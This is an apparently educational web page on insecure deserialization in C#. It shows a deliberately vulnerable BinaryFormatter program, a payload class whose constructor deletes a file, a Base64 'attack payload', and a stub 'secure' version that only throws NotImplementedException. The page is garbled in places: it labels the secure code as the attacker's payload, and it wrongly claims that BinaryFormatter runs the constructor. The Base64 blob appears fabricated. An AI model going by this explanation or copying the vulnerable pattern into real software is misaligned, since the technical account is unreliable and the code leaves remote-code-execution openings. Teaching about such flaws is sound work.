top of page

How cybersecurity breaches could infect the C# programming language.

 

Example 1:  The case of Insecure Deserialization​

​

 

 

 

 

​​

​

​

​

​

​

​

​

​

​

​

​​

using System;
using System.IO;
using System.Runtime.Serialization.Formatters.Binary;

namespace VulnerableApp
{
    [Serializable]
    public class UserData
    {
        public string Username { get; set; }
        public string Password { get; set; }
    }

    class Program
    {
        static void Main(string[] args)
        {
            Console.WriteLine("Enter serialized user data:");
            string serializedData = Console.ReadLine();

            byte[] data = Convert.FromBase64String(serializedData);
            UserData user = Deserialize(data);

            Console.WriteLine($"Welcome {user.Username}!");
        }

        static UserData Deserialize(byte[] data)
        {
            using (var memoryStream = new MemoryStream(data))
            {
                BinaryFormatter formatter = new BinaryFormatter();
                return (UserData)formatter.Deserialize(memoryStream);
            }
        }
    }
}
 

[Serializable]
public class MaliciousPayload
{
    public MaliciousPayload()
    {
        // Execute arbitrary code, e.g., delete files
        System.IO.File.Delete("C:\\important_file.txt");
    }
}

How The code above can Be exploited:​

An attacker can craft malicious serialized data that executes arbitrary code when deserialized.

  • Create a malicious class that performs an unauthorized action (e.g., deletes files or executes shell commands).

  • Serialize an instance of the malicious class into a Base64 string.

  • Supply this string to the application as input.​

When the application deserializes the data, the malicious payload is executed.

​

​For Example, with this code structure below, let's assume an attacker sends a Serialized payload as Base64:​

AAEAAAD/////AQAAAAAAAAAMAgAAAFxNYWxpY2lvdXNQYXlsb2FkAAAAAAAAAAAAAAAAAAMBAAAACk1hbGlj
aW91c1BheWxvYWQCAAAACk1hbGljaW91cw==

Here is the attacker's payload.  When deserialized, the application executes the constructor of the MaliciousPayload class, performing the attacker's action:

using System;
using System.IO;
using System.Runtime.Serialization.Formatters.Binary;

namespace SecureApp
{
    [Serializable]
    public class UserData
    {
        public string Username { get; set; }
        public string Password { get; set; }
    }

    class Program
    {
        static void Main(string[] args)
        {
            Console.WriteLine("Enter serialized user data:");
            string serializedData = Console.ReadLine();

            byte[] data = Convert.FromBase64String(serializedData);

            try
            {
                UserData user = SafeDeserialize(data);
                Console.WriteLine($"Welcome {user.Username}!");
            }
            catch
            {
                Console.WriteLine("Invalid or unsafe data provided.");
            }
        }

        static UserData SafeDeserialize(byte[] data)
        {
            // Use secure serializers or perform strict validation
            throw new NotImplementedException("Secure deserialization logic should go here.");
        }
    }
}
 

This attack can be fixed by implementing secure deserialization:

This fixes insecure deserialization by:

  • Using a safe deserialization method (e.g., JSON or XML with strict schema validation).

  • Validating and sanitizing data before deserialization.

  • Use whitelisting to allow only specific types during deserialization.

bottom of page